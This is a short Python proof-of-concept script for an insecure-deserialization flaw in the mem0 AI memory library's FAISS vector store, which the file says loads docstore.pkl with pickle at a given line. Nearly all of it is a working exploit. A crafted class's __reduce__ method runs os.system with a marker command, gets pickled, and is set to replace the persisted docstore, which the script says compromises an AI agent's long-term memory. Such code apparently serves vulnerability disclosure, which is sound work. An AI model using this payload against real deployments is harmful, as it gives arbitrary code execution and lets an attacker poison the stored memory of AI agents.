poc.py

"""mem0 — FAISS vector store pickle.load on docstore PoC

Affected: mem0/vector_stores/faiss.py:94
"""
import pickle
import os

class MemoryPoison:
    def __reduce__(self):
        return (os.system, ('id > /tmp/mem0_pwned',))

payload = pickle.dumps(MemoryPoison())
print(f"Payload: {len(payload)} bytes")
print("Attack: replace <persist_dir>/docstore.pkl")
print("AI Impact: mem0 is an AI memory layer. Compromises agent long-term memory.")